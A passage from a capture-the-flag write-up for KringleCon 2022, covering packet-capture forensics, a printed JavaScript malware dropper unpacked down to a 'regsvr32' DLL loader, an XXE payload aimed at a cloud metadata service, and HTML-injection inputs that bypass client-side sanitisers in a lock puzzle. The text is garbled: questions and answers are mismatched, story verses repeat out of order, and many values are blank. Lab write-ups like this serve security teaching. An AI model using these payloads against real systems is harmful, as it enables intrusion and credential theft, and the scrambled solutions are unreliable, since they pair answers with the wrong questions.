We'll inspect the IP Source and Destination from that HTTP stream. The fifth question appears:
5. What file is saved to the infected host?
We'll follow that HTTP stream, scroll down and see the following line: saveAs(blob1, '');
. The sixth question appears:
6. Attackers used bad TLS certificates in this traffic. Which countries were they registered to? Submit the names of the countries in alphabetical order separated by a commas (Ex: Norway, South Korea).
Ireland, Isreal, South Sudan, United States
We'll grep the relevant fields (this time using tshark as it's easier to parse the output):
tshark -nr suspicious.pcap -2 -R "ssl.handshake.certificate" -V > out.txt
cat out.txt | grep -i country
The seventh question appears:
7. Is the host infected (Yes/No)?
Results from the analysis above.
We have solved that challenge and get the confirmation:
Find the Next Objective
Talk to Dusty Giftwrap for the next objective.
We get following hints:
The hardest steps in this challenge have hints. Just type hint
in the top panel!
New to Windows event logs? Get a jump start with Eric's talk!
If you're curious what's inside that package:
└─$ cat suspicious.js
const fs = require('fs');
let byteCharacters = atob('UEsDBBQAAAAIAFCjN
//saveAs(blob1, '');
fs.writeFile('', Buffer.from(byteArray), 'binary', (err)=> {
if (err) {
console.log("There was an error writing the image")
else {
console.log("Written File")
└─$ node suspicious.js
Written File
└─$ unzip
inflating: Ref_Sept24-2020.scr
└─$ unrar x Ref_Sept24-2020.scr
Extracting PLS.exe OK
Extracting selector.vbs OK
Extracting dsep.bat OK
Extracting SLP.txt OK
All OK
└─$ unrar e -pVersion SLP.txt
Extracting fatless.vbs OK
Extracting lll.bat OK
Extracting CONFIG.dll OK
All OK
└─$ cat lll.bat
regsvr32 -s CONFIG.dll
The next attack is forced browsing where the naughty one is guessing URLs. What's the first successful URL path in this attack?
After talking with Alabaster Snowball you will get following hint:
The victim web server is Which host is the next top talker?
We'll unzip the artifacts and get a PCAP file which we can open using Wireshark. To see the Top Talkers we select statistics - conversations and the tab IPv4. By sorting the column packets we can see which host is sending/receiving the most packets and causing the biggest traffic.
In our case it's
We get following hints:
The site's login function is at /login.html
. Maybe start by searching for a string.
Alabaster Snowball is standing in the very dark.
Let's open up Wireshark again. As we want to focus on POST requests to /login.html
we set the filter to:
http.request.uri contains "login.html" and http.request.method == "POST"
We select the first entry and right-click -> follow -> HTTP stream:
POST /login.html HTTP/1.1
username=alice&password=philipHTTP/1.1 200 OK
So the first username tried is alice
We get following hints:
With forced browsing, there will be many 404 status codes returned from the web server. Look for 200 codes in that group of 404s. This one can be completed with the PCAP or the log file.
Alabaster Snowball is standing in the very dark.
The last step in this attack was to use XXE to get secret keys from the IMDS service. What URL did the attacker force the server to fetch?
Let's open up Wireshark again. As we know the destination must be ip
(seen in the challenge before). The attacks started at frame nr. 7229
and the "login failed"-frame has a fixed size of 742 byte. So everything else should be a good match. We set following filter:
ip.dst_host == "" and http.response.code == 200 and frame.len != 742 and frame.number > 7229
We select the first entry and right-click -> follow -> HTTP stream:
GET /proc HTTP/1.1
HTTP/1.1 200 OK
So the first successful URL tried is /proc
We get following hints:
AWS uses a specific IP address to access IMDS, and that IP only appears twice in this PCAP.
Use the artifacts from Alabaster Snowball to analyze this attack on the Boria mines. Most of the traffic to this site is nice, but one IP address is being naughty! Which is it? Visit Sparkle Redberry in the Web Ring for hints.
Let's open up Wireshark again. As we know the source must be ip
(seen in the challenges before), and AWS IMDS lookups contain a special IP
we build the following filter:
ip.src_host == "" and contains ""
We select the last entry and right-click -> follow -> HTTP stream:
POST /proc HTTP/1.1
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY id SYSTEM ""> ]>
HTTP/1.1 200 OK
So the URL fetched is
We get following hints:
The locks take input, render some type of image, and process on the back end to unlock. To start, take a good look at the source HTML/JavaScript.
Understanding how Content-Security-Policy works can help with this challenge.
Developers use both client- and server-side input validation to keep out naughty input.
Hal Tandybuck is trying to open that door and asking you for help.
Open the door to the Boria Mines. Help Alabaster Snowball in the Web Ring to get some hints for this challenge.
Let's just right-click -> show frame source on the lock window to find out the destination:
. The interesting parts here are:
<div class="iframes">
<iframe src='/pin1' class='pin1'></iframe>
<iframe src='/pin2' class='pin2'></iframe>
<iframe src='/pin3' class='pin3'></iframe>
<iframe src='/pin6' class='pin6'></iframe>
<iframe src='/pin5' class='pin5'></iframe>
<iframe src='/pin4' class='pin4'></iframe>
<script src="conduit.js"></script>
<script src="app.js"></script>
Let's look at the source for Pin1:
<form method='post' action='pin1'>
<!-- @&@&&W&&W&&&& -->
<input class='inputTxt' name='inputTxt' type='text' value='' autocomplete='off' />
Why not just try that string mentioned in the comments? Indeed it's unlocking the first Pin.
Let's look at the source for Pin2:
<form method='post' action='pin2'>
<input class='inputTxt' name='inputTxt' type='text' value='' autocomplete='off' />
As we want to connect dots on different levels, let's try to use HTML <br>
mixed with Uniface characters to draw the lines:
resulting in
Let's look at the source for Pin3:
<form method='post' action='pin3'>
<input class='inputTxt' name='inputTxt' type='text' value='' autocomplete='off' />
Guess the same technique should be working here as well. At the first try I didn't work, seems the color code must match here as well, so let's include this information as well:
resulting in
<font color="blue">──────╭─────█<br>──╭───╯──────<br>█─╯──────────</font>
The first three pins were open to unlock the gate.
We get following hints:
Early parts of this challenge can be solved by focusing on Glamtariel's WORDS.
Another hint should be available if the remaining locks are also solved, so let's carry on.
Let's look for the source of Pin4:
const sanitizeInput = () => {
const input = document.querySelector('.inputTxt');
const content = input.value;
input.value = content
.replace(/"/, '')
.replace(/'/, '')
.replace(/</, '')
.replace(/>/, '');
<form method='post' action='pin4'>
<input class='inputTxt' name='inputTxt' type='text' value='' autocomplete='off' onblur='sanitizeInput()' />
This time we have a slightly different pattern. In addition there is a sanitization implemented. As the whole string gets sanitized only for the first occurence of the shown characters we can just "duplicate" them.
resulting in
o █───────────█ █───────────█ <<font color=""blue">>█───────────█</font>
Let's look for the source of Pin5:
<meta http-equiv="Content-Security-Policy" content="script-src 'self' 'unsafe-inline'; style-src 'self'">
const sanitizeInput = () => {
const input = document.querySelector('.inputTxt');
const content = input.value;
input.value = content
.replace(/"/gi, '')
.replace(/'/gi, '')
.replace(/</gi, '')
.replace(/>/gi, '');
<form method='post' action='pin5'>
<input class='inputTxt' name='inputTxt' type='text' value='' autocomplete='off' onblur='sanitizeInput()' />
Okay, this time the sanitization catches all occurences. Maybe it's easier to "tweak" the client-side code. We'll open Burp Suite and use the built-in proxy. Just submit any character in the text field while intercept is on, select Action -> Do intercept -> Response to this request.
Afterwards we'll submit:
resulting in
o <font color="red">█─╭─────────█</font> <font color="red">█╭╯──</font><font color="blue">──╭────█</font> <font color="red">█╯</font><font color="blue">╭────╯───█ █─│</font>
Let's look for the source of Pin6:
<meta http-equiv="Content-Security-Policy" content="script-src 'self'; style-src 'self'">
<form method='post' action='pin6'>
<input class='inputTxt' name='inputTxt' type='text' value='' autocomplete='off' />
No sanitization in place? Ok let's just submit a proper pattern :-)
resulting in
<font color="lime">█───────────█</font> <font color="red">█─────────╮─█</font> <font color="blue">█─╮───────</font><font color="red">╰─█</font> <font color="blue">█─╰──────╮──█ █────────┃</font>
The final solution looks like this:
We get following hints:
Sometimes we can hit web pages with XXE when they aren't expecting it!
Jingle Ringford is standing next to a table and a cash machine. He is welcoming you to this year's KringleCon.
Get your bearings at KringleCon
Let's click on the KTM machine (KringleCoin Teller Machine). Of course we'll note that it's very important to copy down all the information.
So we are storing both the WalletAddress and the Private (Secret) Key in a safe place.
Let's use the terminal which has magically appeared.
We'll enter answer
in the upper terminal window and the gates are opening.
There is a chest hidden containing 10 KringleCoins and a Hint for the Smart Contract Objective.
Just found it, seems that chest does not provide any additional hints.
There is a chest hidden containing 13 KringleCoins and a Hint for the Blockchain Divination Objective.
After you have found that chest (Hall of Talks) you get following hint:
Find a transaction in the blockchain where someone sent or received KringleCoin! The Solidity Source File is listed as KringleCoin.sol
. Tom's Talk might be helpful!
There is a chest hidden containing 27 KringleCoins and a Hint for the Blockchain Divination Objective.
After you have found that chest (NPSL (Outside Tolkien Ring)) you get following hint:
Look at the transaction information. There is a From: address and a To: address. The To: address lists the address of the KringleCoin smart contract.
There is a chest hidden containing 25 KringleCoins and a Hint for the Smart Contract Objective.
After finding the chest (NPSL (Outside Elfen Ring)) you will get following hint:
You're going to need a Merkle Tree of your own. Math is hard. Professor Petabyte can help you out.
There is a chest hidden containing 20 KringleCoins, a Special Hat and a Hint for Smart Contract Objective.
Just found it, seems that chest does not provide any additional hints. At least you'll get a really cool hat.
There is a chest hidden containing 15 KringleCoins and a Hint for the Smart Contract Objective.
After finding that chest (Tolkien Ring) you will get the following hint:
You can change something that you shouldn't be allowed to change. This repo might help!
Santa is asking you to find the five golden rings. To reach the finale you have to solve all challenges.
Solve all challenges to reach the finale and win the game.
After having solved all the other challenges the full story unfolds:
Five Rings for the Christmas king immersed in cold
Each Ring now missing from its zone
The first with bread kindly given, not sold
Another to find 'ere pipelines get owned
One beneath a fountain where water flowed
Into clouds Grinchum had the fourth thrown
The fifth on blockchains where shadows be bold
One hunt to seek them all, five quests to find them
One player to bring them all, and Santa Claus to bind them
Merry Christmas and thanks to everyone who made KringleCon2022 possible!
Santa is asking you to find the five golden rings. One of the lost rings is the Burning Ring of Fire.
Recover the Burning Ring of Fire.
This can be done by solving the objectives
After solving all necessary objectives we get a new story entry:
Five Rings for the Christmas king immersed in cold
Each Ring now missing from its zone
The first with bread kindly given, not sold
Into clouds Grinchum had the fourth thrown
Santa is asking you to find the five golden rings. One of the lost rings is the Cloud Ring.
Recover the Cloud Ring.
This can be done by solving the objectives
After solving all necessary objectives we get a new story entry:
Five Rings for the Christmas king immersed in cold
Each Ring now missing from its zone
The first with bread kindly given, not sold
One beneath a fountain where water flowed
Into clouds Grinchum had the fourth thrown
Santa is asking you to find the five golden rings. One of the lost rings is the Elfen Ring.
Recover the Elfen Ring.
This can be done by solving the objectives
After solving all necessary objectives we get a new story entry:
Five Rings for the Christmas king immersed in cold
Each Ring now missing from its zone
The first with bread kindly given, not sold
Another to find 'ere pipelines get owned
One beneath a fountain where water flowed
Into clouds Grinchum had the fourth thrown
The fifth on blockchains where shadows be bold
One hunt to seek them all, five quests to find them
Santa is asking you to find the five golden rings. One of the lost rings is the Tolkien Ring.
Recover the Tolkien Ring.
This can be done by solving the objectives
After solving all necessary objectives we get a new story entry:
Five Rings for the Christmas king immersed in cold
Each Ring now missing from its zone
The first with bread kindly given, not sold
Santa is asking you to find the five golden rings. One of the lost rings is the Web Ring.
Recover the Web Ring.
This can be done by solving the objectives
After solving all necessary objectives we get a new story entry:
Five Rings for the Christmas king immersed in cold
Each Ring now missing from its zone
The first with bread kindly given, not sold
Another to find 'ere pipelines get owned
One beneath a fountain where water flowed
Into clouds Grinchum had the fourth thrown